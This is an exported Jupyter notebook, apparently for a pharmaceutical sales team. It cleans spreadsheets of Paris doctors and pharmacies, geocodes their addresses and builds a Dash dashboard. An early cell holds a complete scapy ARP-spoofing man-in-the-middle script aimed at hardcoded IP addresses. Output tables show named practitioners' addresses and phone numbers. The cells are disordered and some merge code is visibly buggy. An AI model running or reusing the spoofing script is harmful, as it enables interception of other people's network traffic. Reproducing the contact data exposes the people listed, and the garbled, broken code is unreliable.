    return get("http://httpbin.org/ip", proxy) is not None

In [ ]:
available_proxies = list(filter(check_proxy, proxies))

In [ ]:
import scapy.all as scapy 
import time 
  
def get_mac(ip): 
    arp_request = scapy.ARP(pdst = ip) 
    broadcast = scapy.Ether(dst ="ff:ff:ff:ff:ff:ff") 
    arp_request_broadcast = broadcast / arp_request 
    answered_list = scapy.srp(arp_request_broadcast, timeout = 5, verbose = False)[0] 
    return answered_list[0][1].hwsrc 
  
def spoof(target_ip, spoof_ip): 
    packet = scapy.ARP(op = 2, pdst = target_ip, hwdst = get_mac(target_ip), 
                                                            psrc = spoof_ip) 
    scapy.send(packet, verbose = False) 
  
  
def restore(destination_ip, source_ip): 
    destination_mac = get_mac(destination_ip) 
    source_mac = get_mac(source_ip) 
    packet = scapy.ARP(op = 2, pdst = destination_ip, hwdst = destination_mac, psrc = source_ip, hwsrc = source_mac) 
    scapy.send(packet, verbose = False) 
      

        
target_ip = "172.65.248.213" # Enter your target IP 
gateway_ip = "92.67.15.90" # Enter your gateway's IP 
  
try: 
    sent_packets_count = 0
    while True: 
        spoof(target_ip, gateway_ip) 
        spoof(gateway_ip, target_ip) 
        sent_packets_count = sent_packets_count + 2
        print("\r[*] Packets Sent "+str(sent_packets_count), end ="") 
        time.sleep(2) # Waits for two seconds 

except KeyboardInterrupt: 
    print("\nCtrl + C pressed.............Exiting") 
    restore(gateway_ip, target_ip) 
    restore(target_ip, gateway_ip) 
    print("[+] Arp Spoof Stopped")

# JUPYTER DASH

In [ ]:
from application.dash import sidebar

In [ ]:
df = join_id_adr_cdb()

In [ ]:
for i in df[df['spe']==''].index:
    print(i)
    df.loc[i, 'spe']="PHA"

In [ ]:
def options(df, col):
    return[{"label": value, "value": value} for value in df[col].unique()]


df["nom_prenom"] = df["nom"] + ' ' + df["prenom"]
noms_options = options(df, "nom_prenom")

In [ ]:
reg=re.compile("([A-Z\s]+)\s(([A-Z]{1}[a-z\s]*)+)")
df = join_id_adr_cdb()
df["nom_prenom"] = df["nom"] + ' ' + df["prenom"]
for nom_pre in df["nom_prenom"][:5].values:
    print(nom_pre)
    s = re.search(reg, nom_pre)
    nom = s.group(1)
    pre = s.group(2)
    filt=(df['nom']==nom) & (df['prenom']==pre)
    row=df.loc[filt].to_dict('records')[0]
    print(row)

In [ ]:
from dash import dcc, html
import dash_bootstrap_components as dbc
import dash
from application.dash.sidebar import sidebar
import visdcc

In [ ]:
doctors_spes = {
    'GY': 'gynecologue',
    'MGY': 'medecin-generaliste',
    'SF': 'sage-femme',
    'MG': 'medecin-generaliste',
    'GE': 'gastro-enterologue',
    'PE': 'pediatre',
    'PPSY': 'pedopsychiatre',
    'PSY': 'psychiatre',
    'NE': 'neurologue'
}

doctors_features = {}

spes = ["GY", "MGY", "SF", "MG", "GE", "PE"]

In [ ]:
def spe_slider(spe):
    sub_df = df[df["spe"] == spe]
    return dbc.Row(
        [
            dbc.Col(
                [
                   spe
                ],
                style={"width": "40px"}
            ),
            dbc.Col(
                [
                    dcc.RangeSlider(
                        sub_df.pot.min(), 
                        sub_df.pot.max(), 
                        id=f"{spe.lower()}-pot-slider",  
                        value = [sub_df.pot.min(), sub_df.pot.max()],
                        tooltip = {"placement": "bottom", "always_visible": True},
                        className="ms-1 w-100",
                        marks=None

                    )
                ],
                style={"transform": 'translateY(15px)', "flex-grow": "1"}
            )
        ],
        style={"display": "flex", "align-items": "center", "margin": "5%", "width":" 100%"}
    )

spes_options = [{"label": spe_slider(spe), "value": spe} for spe in doctors_spes.keys()]

def build_layout():
    return html.Div(
        [
            dcc.Checklist(
                options=spes_options,
                value=spes,
                id="spe-cl",
                inputStyle={"marginRight": "5px", "transform": "scale(1.5)"},
                labelStyle={"margin": "5px", "display": "flex", "align-items": "center", "height": "65px"}
            ),
        ],
        style={"width": "250px"}
    )

In [ ]:
external_scripts = [
    'https://code.jquery.com/jquery-3.3.1.min.js',
    'https://cdn.datatables.net/v/dt/dt-1.10.18/datatables.min.js',
    "https://cdn.datatables.net/1.13.6/js/dataTables.bootstrap5.min.js",
    {"type": "text/javascript", "src": "application/dash/assets/js/flip.js"},
    {"type": "text/javascript", "src": "application/dash/assets/js/modalize.js"},
    {"type": "text/javascript", "src": "js/leaflet.extra-markers.min.js"},
]
external_stylesheets = [
    dbc.themes.BOOTSTRAP, 
    dbc.icons.FONT_AWESOME,
    {"rel":"stylesheet", "type":"text/css", "src":'https://cdn.datatables.net/v/dt/dt-1.10.18/datatables.min.css'},
    {"rel": "stylesheet", "type": "text/css", "src": "css/leaflet.extra-markers.min.css"},
    {"rel": "stylesheet", "type": "text/css", "src": "css/sidebar.css"},
    {"rel": "stylesheet", "type": "text/css", "src": "css/hamburgers.css"},
    {"rel": "stylesheet", "type":"text/css", "src":'https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.css'},
    {"rel": "stylesheet", "type":"text/css", "src":'https://fonts.googleapis.com/css?family=Open+Sans'},
    {"rel": 'stylesheet', "type":'text/css', "src":'https://use.fontawesome.com/releases/v5.15.1/css/all.css'}
]

app = Dash(__name__)

app.layout = build_layout()

app.run_server(debug=True)

    geo_json = read_geojson(target_geojson)

    with open("assets/target_geojson.json", "r") as cible_json:
        json.loads(cible_json.read())

    target_geojson

# CLEANING DATA

    #to change output windows' heights  
    css = ".output_wrapper { min-height: none; }"  
    HTML('<style>{}</style>'.format(css))

In [4]:
fp1 = "application/data/xls_x/carnet_de_bord.xlsx"
fp2 = "application/data/xls_x/histo.xlsx"

## PDS

In [5]:
converters={
    'nom': str,
    'prenom': str,
    'spe': str,
    'uga': str,
    'etablissement': str,
    'adresse': str,
    'cp': int,
    'ville': str,
    'tel': str,
    'pot': int,
    'pvm': int,
    'nv2022': int,
    'commentaire': str,
    'lun_mat': str,
    'lun_am': str,
    'mar_mat': str,
    'mar_am': str,
    'mer_mat': str,
    'mer_am': str,
    'jeu_mat': str,
    'jeu_am': str,
    'ven_mat': str,
    'ven_am': str,
    'ciblage': int,
    'ddv': np.datetime64,
    'dpv': np.datetime64,
    'rdv': str,
    'decile': str,
    'reception': str,
    'pk': str
}

In [6]:
pds = pd.read_excel(fp1, sheet_name="pds", converters=converters)
pds.shape

(2086, 31)

In [9]:
pds.drop([2079, 2080], axis=0, inplace=True)
pds.reset_index(drop=True, inplace=True)

In [10]:
for i, row in pds.iterrows():
    if "PHARM" in row["nom"]:
        pds.drop(i, axis=0, inplace=True)

In [11]:
pds.reset_index(drop=True, inplace=True)

In [12]:
for col in ['titre', 'mix', 'dip', 'nais', 'mail', 'par1', 'par2', 'ddvs', 'tend']:
    pds[col] = pd.Series(index=pds.index, dtype=object)

In [13]:
pds.columns = ['nom', 'prenom', 'spe', 'uga', 'eta', 'adr', 'cp',
       'ville', 'tel', 'pot', 'pvm', 'nv22', 'mode', 'com',
       'lun_mat', 'lun_am', 'mar_mat', 'mar_am', 'mer_mat', 'mer_am',
       'jeu_mat', 'jeu_am', 'ven_mat', 'ven_am', 'ddv', 'dpv', 'cib',
       'rdv', 'dec', 'rec', 'pk', 'titre', 'mix', 'dip', 'nais',
       'mail', 'par1', 'par2', 'ddvs', 'tend']

In [14]:
pds = pds[[
    'titre', 'nom', 'prenom', 'spe', 'tend', 'pot', 'pvm', 'nv22','cib', 'dec', 'mix', 'dip', 'nais', 'mail',
    'uga', 'eta', 'adr', 'cp', 'ville', 'tel', 'par1', 'par2',
    'mode', 'com', 'lun_mat', 'lun_am', 'mar_mat', 'mar_am', 'mer_mat', 'mer_am', 'jeu_mat', 'jeu_am', 'ven_mat', 'ven_am', 'ddv', 'dpv', 'rdv', 'rec', 'pk', "ddvs"
]]

In [15]:
pds_hist = pd.read_excel(fp2, sheet_name="pds")
pharm_hist = pd.read_excel(fp2, sheet_name="pharma")

In [16]:
pds_hist.columns = ['date', 'datetime', 'id', 'titre', 'nom', 'prenom', 'spe', 'tend', 'mix', 'dip', 'nais', 'mail', 'pot', 'pvm', 'par1', 'par2']

In [17]:
pds_hist['time'] = [dt[-5:] for dt in pds_hist['datetime']]
pharm_hist['time'] = [dt[-5:] for dt in pharm_hist['datetime']]

In [18]:
pds_hist=pds_hist[['datetime', 'date', 'time', 'id', 'titre', 'nom', 'prenom', 'spe', 'tend', 'mail', 'nais', 'dip', 'mix', 'pot', 'pvm', 'par1', 'par2']]

In [19]:
for col in pds_hist.columns:
    if len(pds_hist[pds_hist[col].isna()]) > 0:
        print(f"{col}\t:\t {round(len(pds_hist[pds_hist[col].isna()])/len(pds_hist)*100,1)}% NaN")
        if col in ['nais', 'dip', 'pot', 'pvm']:
            pds_hist[col] = pds_hist[col].fillna(0).astype(int)
        else:
            pds_hist[col] = pds_hist[col].fillna('')

tend	:	 60.5% NaN
mail	:	 88.1% NaN
nais	:	 5.8% NaN
dip	:	 14.0% NaN
mix	:	 0.6% NaN
pot	:	 0.6% NaN
pvm	:	 0.9% NaN
par1	:	 66.3% NaN
par2	:	 79.1% NaN

In [20]:
pds_hist.sample()

             datetime        date   time                id    titre     nom    prenom                spe tend mail  nais  dip    mix  pot  pvm par1 par2
326  05/12/2023 16:00  05/12/2023  16:00  BLAISE, BENJAMIN  Docteur  BLAISE  BENJAMIN  Médecine générale            1986    0  Ville  354   36

In [21]:
pds.loc[(pds['nom']=="THUAIRE")&(pds['prenom']=="MICHEL".title())]

   titre      nom  prenom spe tend  pot pvm nv22 cib  dec  mix  dip nais mail    uga  eta                 adr     cp  ville        tel par1 par2 mode  com lun_mat    lun_am mar_mat    mar_am mer_mat mer_am jeu_mat jeu_am ven_mat ven_am                 ddv dpv  rdv  rec   pk ddvs
93   NaN  THUAIRE  Michel  MG  NaN  542  28    2   3  NaN  NaN  NaN  NaN  NaN  75INV  NaN  2 RUE ROSA BONHEUR  75007  PARIS  145669902  NaN  NaN    L  NaN     NaN  15:00:00     NaN  15:00:00     NaN    NaN     NaN    NaN     NaN    NaN 2023-09-11 16:00:00 NaT  NaN  NaN  NaN  NaN

In [22]:
from datetime import datetime

In [23]:
for i, row in pds_hist.iterrows():
    pds_row = pds.loc[(pds['nom']==row['nom'])&(pds['prenom']==row['prenom'].title())]
    pds_ix = pds_row.index.values
    if list(pds_ix) == []:
        #print(pds_hist.loc[i, 'id'])
        pass
    else:
        if pd.isnull(pds.loc[pds_ix[0], 'ddv']):
            pds.loc[pds_ix[0], 'ddv'] = pd.to_datetime(row['datetime'], dayfirst=True).strftime('%Y-%m-%d %H:%M:%S')
            # print("no ddv", pds.loc[pds_ix[0], 'nom'], pd.to_datetime(row['datetime'], dayfirst=True).strftime('%Y-%m-%d %H:%M:%S'))
            
        else:
            
            if pd.isnull(pds.loc[0, 'ddvs']):
                ddvs = []
            else:
                ddvs=pds.loc[pds_ix[0], 'ddvs']
                
            ddv = pd.to_datetime(pds.loc[pds_ix[0], 'ddv'])
            dt = pd.to_datetime(row['datetime'], dayfirst=True)
            if dt > datetime.now():
                pds.loc[pds_ix[0], 'dpv'] = dt.strftime('%Y-%m-%d %H:%M:%S')
                
            else:
            
                if not ddv.strftime('%d/%m/%Y') == row['date'] and ddv < dt:
                    ddvs.append(pds.loc[pds_ix[0], 'ddv'])
                    pds.loc[pds_ix[0], 'ddvs'] = ddvs
                    pds.loc[pds_ix[0], 'ddv'] = pd.to_datetime(row['datetime'], dayfirst=True).strftime('%Y-%m-%d %H:%M:%S')

                elif not ddv.strftime('%d/%m/%Y') == row['date'] and ddv > dt:
                    ddvs.append(pd.to_datetime(row['datetime'], dayfirst=True).strftime('%Y-%m-%d %H:%M:%S'))
                    pds.loc[pds_ix[0], 'ddvs'] = ddvs
            
            #print("already ddv", pds.loc[pds_ix[0], 'nom'], pd.to_datetime(pds.loc[pds_ix[0], 'ddv']).strftime('%d/%m/%Y'), row['date'])
            #print(row['date'], pds.loc[pds_ix[0], 'ddv'], pd.to_datetime(pds.loc[pds_ix[0], 'ddv']).strftime('%d/%m/%Y'), row['date'] == pd.to_datetime(pds.loc[pds_ix[0], 'ddv']).strftime('%d/%m/%Y'))            
            #print(pd.to_datetime(pds.loc[pds_ix[0], 'ddv']).strftime('%Y-%m-%d'), pd.to_datetime(row['datetime']).strftime('%Y-%m-%d'))
            #print(pd.to_datetime(pds.loc[pds_ix[0], 'ddv']).strftime('%Y-%m-%d') == pd.to_datetime(row['datetime']).strftime('%Y-%m-%d'))

In [24]:
for i, row in pds_hist.iterrows():
    pds_row = pds.loc[(pds['nom']==row['nom'])&(pds['prenom']==row['prenom'].title())]
    pds_ix = pds_row.index.values
    if list(pds_ix) == []: # i.e. absent du fichier ?
        #print(pds_hist.loc[i, 'id'])
        pass
    else:
        if row['pvm'] !=  pds.loc[pds_ix[0], 'pvm'] :
            pds.loc[pds_ix[0], 'pvm'] = row['pvm']
            
        for col in['titre', 'tend', 'mail', 'nais', 'dip', 'mix', 'par1', 'par2']:
            pds.loc[pds_ix[0], col] = row[col]

In [25]:
pds['nais'] = [2023-row['nais'] if not pd.isnull(row['nais']) else '' for i, row in pds.iterrows()]
pds['dip'] = [2023-row['dip'] if not pd.isnull(row['dip']) else '' for i, row in pds.iterrows()]

In [26]:
for col in pds.columns:
    if len(pds[pds[col].isna()]) > 0:
        print(f"{col}\t:\t {round(len(pds[pds[col].isna()])/len(pds)*100,1)}% NaN")
        if col in ["pot", "pvm", "nv22", "cib"]:
            pds[col] = pds[col].fillna(0).astype(int)
        else:
            pds[col] = pds[col].fillna('')

titre	:	 87.0% NaN
tend	:	 87.0% NaN
pot	:	 1.3% NaN
pvm	:	 3.9% NaN
nv22	:	 85.9% NaN
cib	:	 87.6% NaN
dec	:	 83.3% NaN
mix	:	 87.0% NaN
mail	:	 87.0% NaN
eta	:	 64.4% NaN
tel	:	 13.9% NaN
par1	:	 87.0% NaN
par2	:	 87.0% NaN
mode	:	 69.7% NaN
com	:	 95.2% NaN
lun_mat	:	 99.6% NaN
lun_am	:	 99.6% NaN
mar_mat	:	 99.7% NaN
mar_am	:	 99.5% NaN
mer_mat	:	 99.4% NaN
mer_am	:	 99.6% NaN
jeu_mat	:	 99.6% NaN
jeu_am	:	 99.6% NaN
ven_mat	:	 99.6% NaN
ven_am	:	 99.7% NaN
ddv	:	 86.7% NaN
dpv	:	 99.0% NaN
rdv	:	 100.0% NaN
rec	:	 99.4% NaN
pk	:	 98.4% NaN
ddvs	:	 98.0% NaN

In [27]:
for col in pds.columns:
    if len(pds[pds[col].isna()]) > 0:
        print(f"{col}\t:\t {round(len(pds[pds[col].isna()])/len(pds)*100,1)}% NaN")

ddv	:	 86.7% NaN
dpv	:	 99.0% NaN

In [28]:
for i, row in pds.iterrows():
    for col in ['nais', 'dip', 'pot', 'pvm', 'cib', 'nv22']:
        if row[col] == 0:
            pds.loc[i, col] = ''

In [80]:
pds["tel"] = ["0" + str(row["tel"]) if row["tel"] != "" else '' for i, row in pds.iterrows() ]
pds["tel"] = [str(row["tel"][:2]+" "+row["tel"][2:4]+" "+row["tel"][4:6]+" "+row["tel"][6:8]+" "+row["tel"][8:10]) if row["tel"] != "" else '' for i, row in pds.iterrows()]

In [30]:
pds["id"] = pds.index + 1

In [31]:
pds = pds[
    [
        'id', 'titre', 'nom', 'prenom', 'spe', 'tend', 'pot', 'pvm', 'nv22', 'cib', 'dec', 'mix', 'dip', 'nais', 'mail',
        'uga', 'eta', 'adr', 'cp', 'ville', 'tel', 'par1', 'par2',
        'mode', 'com', 'ddvs', 'ddv', 'dpv', 'rdv', 'rec', 'pk', 'lun_mat', 'lun_am', 'mar_mat', 'mar_am', 'mer_mat', 'mer_am','jeu_mat', 'jeu_am', 'ven_mat', 'ven_am'
    ]
]

In [32]:
pds.sample(3)

        id titre        nom       prenom spe tend  pot pvm nv22 cib dec mix dip nais mail    uga             eta                              adr     cp              ville             tel par1 par2      mode com ddvs ddv dpv rdv rec pk lun_mat lun_am mar_mat mar_am mer_mat mer_am jeu_mat jeu_am ven_mat ven_am
2045  2046        AHMED ALI      Nassima  PE       103   2    2   3                        92NEU  HÔP DE NEUILLY  36 BOULEVARD DU GENERAL LECLERC  92200  NEUILLY-SUR-SEINE  01 40 88 61 54            RAPPELER          NaT NaT
679    680           CAHANE  Jean Pierre  MG       377                                     75INV                                5 RUE COGNACQ JAY  75007              PARIS  01 42 22 55 22                              NaT NaT
896    897          GUILLON         Jean  MG        20                                     75MNP                            113 117 RUE CAMBRONNE  75015              PARIS  01 56 58 04 44                              NaT NaT

In [34]:
pds.loc[19, 'cp'] = 75007
pds.loc[19, 'adr'] = "RUE DE BUENOS AIRES"

pds.loc[24, 'uga'] = '75PER'

pds.loc[214, 'adr'] = '51 RUE JEAN DE LA FONTAINE'
pds.loc[263, 'adr'] = '51 RUE JEAN DE LA FONTAINE'

pds.loc[221, 'cp'] = 75116
pds.loc[221, 'adr'] = '7 RUE DU BOUQUET DE LONGCHAMP'

In [35]:
identities = pds[["id", "titre", "nom", "prenom", "spe", "tend", "pot", "pvm", "nv22", "cib", "dec", "mix", "dip", "nais", "mail"]].copy()

In [36]:
def get_identity(docId):
    return pd.DataFrame(identities[identities["id"] == docId])

## ADRESSES

In [37]:
adresses = pds[['uga', 'eta', 'adr', 'cp', 'ville', 'tel', 'par1', 'par2']].copy()
adresses.shape
adresses.drop_duplicates(['adr', 'cp', 'ville'], inplace=True)
adresses.shape

(2079, 8)

(998, 8)

In [38]:
adresses.reset_index(drop=True, inplace=True)

In [39]:
adresses["id"] = adresses.index + 1

### IF NOT DONE

In [43]:
adresses.loc[997]

uga                  92NEU
eta
adr          6 RUE BOUTARD
cp                   92200
ville    NEUILLY-SUR-SEINE
tel         01 47 22 38 04
par1
par2
id                     998
Name: 997, dtype: object

In [44]:
adresses["lat"] = pd.Series(dtype=float)
adresses["lon"] = pd.Series(dtype=float)

errors = []
for i, row in tqdm(adresses.iterrows(), total=len(adresses)):
    adr = row["adr"] + " " + str(row["cp"]) + " " +row["ville"]
    try:
        location = geolocator.geocode(adr)
        if location is not None:
            adresses.loc[i, "lat"] = location.latitude
            adresses.loc[i, "lon"] = location.longitude
        else:
            errors.append(i)
            print(f"problem at index {i} with adress {adr}")
    except:
        errors.append(i)
        print(f"except at index {i} with adress {adr}")

  0%|          | 0/998 [00:00<?, ?it/s]

In [45]:
lat_lon_save = adresses[['id', 'lat', 'lon']].copy()
lat_lon_save.to_csv("application/data/csv/lat_lon_save.csv", sep=";", index=False)

### IF DONE AND SAVED

In [ ]:
lat_lon_save = pd.read_csv("application/data/csv/lat_lon_save.csv", sep=";")

In [ ]:
adresses['lat'] = [lat_lon_save.loc[lat_lon_save['id']==adresses.loc[i, 'id'], 'lat'].values[0] for i in range(adresses.shape[0])]
adresses['lon'] = [lat_lon_save.loc[lat_lon_save['id']==adresses.loc[i, 'id'], 'lon'].values[0] for i in range(adresses.shape[0])]

### GET ADRESS ID

In [46]:
def get_adress_id(docId):
    row = pds[pds["id"]==docId]
    # print(row['nom'])
    return adresses["id"][(adresses["adr"]==row["adr"].values[0]) & (adresses["cp"]==row["cp"].values[0]) & (adresses["ville"]==row["ville"].values[0])].values[0]

## CONNECTIONS

In [50]:
connections = pd.DataFrame(dtype=int, index=pds.index)
connections["doc_id"] = identities["id"]

In [51]:
connections['doc_id'].max()

2079

In [52]:
get_adress_id(2079)

83

In [ ]:
for idy in connections["doc_id"]:
    row = pds[pds["id"]==idy]
    adr_id = get_adress_id(idy)
    print("doc id:\t", idy, "\tadr id:\t", adr_id)

In [53]:
connections["adr_id"] = [get_adress_id(docId) for docId in connections["doc_id"]]

In [57]:
pds["adr_id"] = [get_adress_id(docId) for docId in connections["doc_id"]]

In [54]:
def get_adresses(docId):
    
    result = pd.DataFrame(dtype=object, columns=["uga", "etablissement", "adresse", "cp", "ville", "tel", "id"])
    arr = connections["adress_id"][connections["doc_id"] == docId].values
    
    for adr_id in arr:
        result = pd.concat([result, pd.DataFrame(adresses[adresses["id"]==adr_id])], ignore_index=True)

    return result[["id", "uga", "etablissement", "adresse", "cp", "ville", "tel"]]

## CARNETS DE BORD

In [59]:
cdb_cols = ['id', 'adr_id', 'mode', 'com', 'ddvs', 'ddv', 'dpv', 'rdv', 'rec', 'pk', 'lun_mat', 'lun_am', 'mar_mat', 'mar_am', 'mer_mat', 'mer_am','jeu_mat', 'jeu_am', 'ven_mat', 'ven_am']
cdbs = pds[cdb_cols].copy()
cdbs.columns = ['doc_id', 'adr_id', 'mode', 'com', 'ddvs', 'ddv', 'dpv', 'rdv', 'rec', 'pk', 'lun_mat', 'lun_am', 'mar_mat', 'mar_am','mer_mat', 'mer_am', 'jeu_mat', 'jeu_am', 'ven_mat', 'ven_am']

In [60]:
cdbs["id"] = cdbs.index + 1
cdbs["id"] = cdbs["id"].astype(int)

In [61]:
cdbs["rdv"] = [True if pd.isnull(row["dpv"]) == 0 else '' for i, row in cdbs.iterrows()]

In [63]:
cdbs = cdbs[["id", "doc_id", "adr_id", "mode", "com", 'ddv', 'dpv', 'rdv', 'rec', 'pk', 'lun_mat', 'lun_am', 'mar_mat', 'mar_am','mer_mat', 'mer_am', 'jeu_mat', 'jeu_am', 'ven_mat', 'ven_am']]

In [64]:
connections["cdb_id"] = [cdbs["id"][(cdbs["doc_id"]==row["doc_id"])&(cdbs["adr_id"]==row["adr_id"])].values[0] for i, row in connections.iterrows()]

In [65]:
connections['id'] = connections.index + 1

In [66]:
connections = connections[["id", "doc_id", "adr_id", "cdb_id"]]

In [67]:
def get_cdbs(docId):
    
    adrs = get_adresses(docId)    
    result = pd.DataFrame(dtype=object, columns=["id", "doc_id", "adr_id", "mode", "com", 'ddv', 'dpv', 'rdv', 'rec', 'pk', 'lun_mat', 'lun_am', 'mar_mat', 'mar_am','mer_mat', 'mer_am', 'jeu_mat', 'jeu_am', 'ven_mat', 'ven_am', 'ddv', 'dpv'])
    
    for i in range(adrs.shape[0]):
        cdb = cdbs[(cdbs["doc_id"]==docId)&(cdbs["adr_id"]==adrs.loc[i, "id"])]
        result = pd.concat([result, cdb], ignore_index=True)
    
    return result

In [68]:
cdbs.drop(["doc_id", "adr_id"], axis=1, inplace=True)

## PHARMAS

In [85]:
pharmas = pd.read_excel(fp1, sheet_name="pharma")
pharmas.shape

(403, 27)

In [86]:
pha_hist = pd.read_excel(fp2, sheet_name="pharma")
pha_hist.shape

(36, 4)

In [87]:
pharmas.columns = [
    'cip', 'nom', 'uga', 'adr', 'cp', 'ville', 'tel', 'cib_vm', 'cib_dp', 'cib_dso', 'nv22', 'ddv', 'rdv',
    'ca_circ_cma_fev23', 'rang_ca_circ_fev23', 'ca_ul_cma_fev_23', 'rang_ca_ul_fev23', 'ca_circ_cma_juin23',
    'rang_ca_circ_juin23', 'ca_ul_cma_juin_23', 'rang_ca_ul_juin23', 'ca_circ_cma_sept23', 'ca_ul_cma_sept23',
    'rang_ca_ul_sept23', 'decil_23', 'groupement', 'contrat_23'
]

for col in pharmas.columns:
    if len(pharmas[pharmas[col].isna()]) > 0:
        print(f"{col}\t:\t {round(len(pharmas[pharmas[col].isna()])/len(pharmas)*100,1)}% NaN")

tel	:	 2.0% NaN
cib_vm	:	 84.4% NaN
cib_dp	:	 49.4% NaN
cib_dso	:	 75.9% NaN
nv22	:	 85.6% NaN
ddv	:	 85.6% NaN
rdv	:	 100.0% NaN
ca_circ_cma_fev23	:	 1.5% NaN
rang_ca_circ_fev23	:	 70.2% NaN
ca_ul_cma_fev_23	:	 1.5% NaN
rang_ca_ul_fev23	:	 70.2% NaN
ca_circ_cma_juin23	:	 37.7% NaN
rang_ca_circ_juin23	:	 70.5% NaN
ca_ul_cma_juin_23	:	 37.7% NaN
rang_ca_ul_juin23	:	 70.2% NaN
ca_circ_cma_sept23	:	 1.5% NaN
ca_ul_cma_sept23	:	 1.5% NaN
rang_ca_ul_sept23	:	 70.2% NaN
decil_23	:	 26.1% NaN
groupement	:	 40.2% NaN
contrat_23	:	 72.5% NaN

In [88]:
pharmas["tel"] = ["0" + str(row["tel"]) if row["tel"] != "" else '' for i, row in pharmas.iterrows() ]
pharmas["tel"] = [str(row["tel"][:2]+" "+row["tel"][2:4]+" "+row["tel"][4:6]+" "+row["tel"][6:8]+" "+row["tel"][8:10]) if row["tel"] != "" else '' for i, row in pharmas.iterrows() ]

In [89]:
for col in ["cib_vm", "cib_dp", "cib_dso", "nv22", 'rang_ca_circ_fev23','rang_ca_ul_fev23','rang_ca_circ_juin23','rang_ca_ul_juin23','rang_ca_ul_sept23', 'decil_23']:
    print(col)
    pharmas[col] = pharmas[col].fillna(0).astype(int)

cib_vm
cib_dp
cib_dso
nv22
rang_ca_circ_fev23
rang_ca_ul_fev23
rang_ca_circ_juin23
rang_ca_ul_juin23
rang_ca_ul_sept23
decil_23

In [90]:
for col in ['ca_circ_cma_fev23', 'ca_ul_cma_fev_23', 'ca_circ_cma_juin23', 'ca_ul_cma_juin_23', 'ca_circ_cma_sept23', 'ca_ul_cma_sept23']:    
    pharmas[col] = pharmas[col].fillna(0)
    pharmas[col] = pharmas[col].apply(lambda x: round(x, 0)).astype(int)
    for i, row in pharmas.iterrows():
        if row[col]==0:
            pharmas.loc[i, col] = ''

In [92]:
pha_hist.columns

Index(['date', 'datetime', 'id', 'mail'], dtype='object')

In [94]:
for col in ['ddvs', 'dpv']:
    pharmas[col] = pd.Series(index=pharmas.index, dtype=object)

In [95]:
for i, row in pha_hist.iterrows():
    pha_row = pharmas.loc[pharmas['nom']==row['id']]
    pha_ix = pha_row.index.values
    if list(pha_ix) == []:
        #print(pds_hist.loc[i, 'id'])
        pass
    else:
        if pd.isnull(pharmas.loc[pha_ix[0], 'ddv']):
            pharmas.loc[pha_ix[0], 'ddv'] = pd.to_datetime(row['datetime'], dayfirst=True).strftime('%Y-%m-%d %H:%M:%S')
            # print("no ddv", pds.loc[pds_ix[0], 'nom'], pd.to_datetime(row['datetime'], dayfirst=True).strftime('%Y-%m-%d %H:%M:%S'))
            
        else:
            
            if pd.isnull(pharmas.loc[0, 'ddvs']):
                ddvs = []
            else:
                ddvs=pharmas.loc[pharmas[0], 'ddvs']
                
            ddv = pd.to_datetime(pharmas.loc[pha_ix[0], 'ddv'])
            dt = pd.to_datetime(row['datetime'], dayfirst=True)
            if dt > datetime.now():
                pharmas.loc[pha_ix[0], 'dpv'] = dt.strftime('%Y-%m-%d %H:%M:%S')
                
            else:
            
                if not ddv.strftime('%d/%m/%Y') == row['date'] and ddv < dt:
                    ddvs.append(pharmas.loc[pha_ix[0], 'ddv'])
                    pharmas.loc[pha_ix[0], 'ddvs'] = ddvs
                    pharmas.loc[pha_ix[0], 'ddv'] = pd.to_datetime(row['datetime'], dayfirst=True).strftime('%Y-%m-%d %H:%M:%S')

                elif not ddv.strftime('%d/%m/%Y') == row['date'] and ddv > dt:
                    ddvs.append(pd.to_datetime(row['datetime'], dayfirst=True).strftime('%Y-%m-%d %H:%M:%S'))
                    pharmas.loc[pha_ix[0], 'ddvs'] = ddvs
            
            #print("already ddv", pds.loc[pds_ix[0], 'nom'], pd.to_datetime(pds.loc[pds_ix[0], 'ddv']).strftime('%d/%m/%Y'), row['date'])
            #print(row['date'], pds.loc[pds_ix[0], 'ddv'], pd.to_datetime(pds.loc[pds_ix[0], 'ddv']).strftime('%d/%m/%Y'), row['date'] == pd.to_datetime(pds.loc[pds_ix[0], 'ddv']).strftime('%d/%m/%Y'))            
            #print(pd.to_datetime(pds.loc[pds_ix[0], 'ddv']).strftime('%Y-%m-%d'), pd.to_datetime(row['datetime']).strftime('%Y-%m-%d'))
            #print(pd.to_datetime(pds.loc[pds_ix[0], 'ddv']).strftime('%Y-%m-%d') == pd.to_datetime(row['datetime']).strftime('%Y-%m-%d'))

In [96]:
pharmas.drop_duplicates(subset=["adr", "cp", "ville"], inplace=True)
pharmas.reset_index(drop=True, inplace=True)
pharmas["id"] = pharmas.index + 1
pharmas = pharmas[['id', 'nom', 'cip', 'adr', 'cp', 'ville', 'tel', 'uga', 'cib_vm', 'cib_dp', 'cib_dso', 'nv22', 'ddvs', 'ddv', 'dpv', 'rdv', 'ca_circ_cma_fev23', 'rang_ca_circ_fev23', 'ca_ul_cma_fev_23',
 'rang_ca_ul_fev23', 'ca_circ_cma_juin23', 'rang_ca_circ_juin23', 'ca_ul_cma_juin_23', 'rang_ca_ul_juin23', 'ca_circ_cma_sept23', 'ca_ul_cma_sept23', 'rang_ca_ul_sept23',
 'decil_23', 'groupement', 'contrat_23']].copy()

In [100]:
pharmas[~pharmas['ddvs'].isna()].sample(3)

    id                           nom      cip                    adr     cp  ville             tel    uga  cib_vm  cib_dp  cib_dso  nv22                   ddvs                 ddv  dpv  rdv ca_circ_cma_fev23  rang_ca_circ_fev23 ca_ul_cma_fev_23  rang_ca_ul_fev23 ca_circ_cma_juin23  rang_ca_circ_juin23 ca_ul_cma_juin_23  rang_ca_ul_juin23 ca_circ_cma_sept23 ca_ul_cma_sept23  rang_ca_ul_sept23  decil_23 groupement contrat_23
7    8                PHARMACIE NIEL  2054150         16 AVENUE NIEL  75017  PARIS  01 47 54 00 39  75TER       3       1        0     2  [2022-05-13 00:00:00] 2023-11-02 10:00:00  NaN  NaN                84                   0             4049                 8                167                    0              3215                 17                418             3108                 18         3     IPHARM        NaN
44  45            PHARMACIE BROVILLE  2192507          47 RUE BALARD  75015  PARIS  01 45 57 97 51  75GRE       3       1        0     2  [2022-05-20 00:00:00] 2023-09-13 14:30:00  NaN  NaN              1985                   3             2298                45               2944                    1              2735                 24               3122             3017                 20         5     IPHARM        NaN
